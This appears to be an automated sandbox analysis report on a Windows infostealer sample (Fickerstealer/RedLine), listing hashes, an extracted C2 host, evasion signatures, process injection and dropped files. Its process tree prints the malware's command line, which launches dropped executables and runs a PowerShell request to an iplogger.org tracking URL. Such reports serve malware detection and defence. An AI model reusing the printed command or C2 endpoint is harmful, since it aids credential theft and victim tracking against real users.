Analysis
-
max time kernel
168s -
max time network
180s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
15-02-2022 12:04
Static task
static1
Behavioral task
behavioral1
Sample
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
Resource
win10v2004-en-20220112
General
-
Target
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
-
Size
3.0MB
-
MD5
c0786eaf915a205bb066e598e5418c6b
-
SHA1
8440f9408fa74c88fad34977ca1ac639c1f5ef2e
-
SHA256
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed
-
SHA512
4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4
Malware Config
Extracted
fickerstealer
game2030.site:80
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp family_redline -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral2/memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp net_reactor -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
MMP1.exeWw.exeMMP1.exepid process 2592 MMP1.exe 2252 Ww.exe 3420 MMP1.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ww.exe -
Loads dropped DLL 1 IoCs
Processes:
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exepid process 1224 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Ww.exe themida behavioral2/memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp themida -
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 53 api.ipify.org -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Ww.exepid process 2252 Ww.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MMP1.exedescription pid process target process PID 2592 set thread context of 3420 2592 MMP1.exe MMP1.exe -
Drops file in Windows directory 3 IoCs
Processes:
TiWorker.exesvchost.exedescription ioc process File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotifyIcon.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe -
Modifies data under HKEY_USERS 49 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "12.503674" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4292" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "3.260723" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "12.501220" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4120" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132895768398047544" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Ww.exepowershell.exepid process 2252 Ww.exe 2252 Ww.exe 1800 powershell.exe 1800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 1800 powershell.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe Token: SeBackupPrivilege 3868 TiWorker.exe Token: SeRestorePrivilege 3868 TiWorker.exe Token: SeSecurityPrivilege 3868 TiWorker.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.execmd.exeMMP1.exedescription pid process target process PID 1224 wrote to memory of 2012 1224 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 1224 wrote to memory of 2012 1224 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 1224 wrote to memory of 2012 1224 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 2012 wrote to memory of 2592 2012 cmd.exe MMP1.exe PID 2012 wrote to memory of 2592 2012 cmd.exe MMP1.exe PID 2012 wrote to memory of 2592 2012 cmd.exe MMP1.exe PID 2012 wrote to memory of 2252 2012 cmd.exe Ww.exe PID 2012 wrote to memory of 2252 2012 cmd.exe Ww.exe PID 2012 wrote to memory of 2252 2012 cmd.exe Ww.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe PID 2012 wrote to memory of 1800 2012 cmd.exe powershell.exe PID 2012 wrote to memory of 1800 2012 cmd.exe powershell.exe PID 2012 wrote to memory of 1800 2012 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exe"MMP1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exe"MMP1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Ww.exe"Ww.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\Ww.exeMD5
e58d740f792702828c45ebfb73c8a95d
SHA18eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
SHA256ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
SHA5129152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
-
C:\Users\Admin\AppData\Local\Temp\nsa7ECE.tmp\JHILLSVZFH1MBP.dllMD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
memory/1800-157-0x00000000077C0000-0x00000000077E2000-memory.dmpFilesize
136KB
-
memory/1800-150-0x00000000071A0000-0x00000000071D6000-memory.dmpFilesize
216KB
-
memory/1800-164-0x0000000008AD0000-0x0000000008AEA000-memory.dmpFilesize
104KB
-
memory/1800-163-0x0000000009DD0000-0x000000000A44A000-memory.dmpFilesize
6.5MB
-
memory/1800-162-0x0000000007335000-0x0000000007337000-memory.dmpFilesize
8KB
-
memory/1800-161-0x0000000008080000-0x000000000809E000-memory.dmpFilesize
120KB
-
memory/1800-159-0x0000000008010000-0x0000000008076000-memory.dmpFilesize
408KB
-
memory/1800-158-0x0000000007FA0000-0x0000000008006000-memory.dmpFilesize
408KB
-
memory/1800-152-0x0000000007970000-0x0000000007F98000-memory.dmpFilesize
6.2MB
-
memory/1800-147-0x00000000738CE000-0x00000000738CF000-memory.dmpFilesize
4KB
-
memory/1800-151-0x0000000007332000-0x0000000007333000-memory.dmpFilesize
4KB
-
memory/1800-149-0x0000000007330000-0x0000000007331000-memory.dmpFilesize
4KB
-
memory/2252-142-0x0000000077164000-0x0000000077166000-memory.dmpFilesize
8KB
-
memory/2252-160-0x00000000058A0000-0x00000000058DC000-memory.dmpFilesize
240KB
-
memory/2252-146-0x00000000738CE000-0x00000000738CF000-memory.dmpFilesize
4KB
-
memory/2252-153-0x00000000060B0000-0x00000000066C8000-memory.dmpFilesize
6.1MB
-
memory/2252-154-0x0000000003620000-0x0000000003632000-memory.dmpFilesize
72KB
-
memory/2252-155-0x0000000005A90000-0x0000000005B9A000-memory.dmpFilesize
1.0MB
-
memory/2252-156-0x0000000005A80000-0x0000000005A81000-memory.dmpFilesize
4KB
-
memory/2252-139-0x0000000076DD0000-0x0000000076DD1000-memory.dmpFilesize
4KB
-
memory/2252-140-0x0000000076DD0000-0x0000000076DD1000-memory.dmpFilesize
4KB
-
memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmpFilesize
7.4MB
-
memory/2592-135-0x0000000003FB0000-0x0000000003FF7000-memory.dmpFilesize
284KB
-
memory/2592-133-0x00000000024E9000-0x0000000002511000-memory.dmpFilesize
160KB
-
memory/2592-134-0x00000000024E9000-0x0000000002511000-memory.dmpFilesize
160KB
-
memory/3420-141-0x0000000000400000-0x000000000044F000-memory.dmpFilesize
316KB
-
memory/3420-137-0x0000000000400000-0x000000000044F000-memory.dmpFilesize
316KB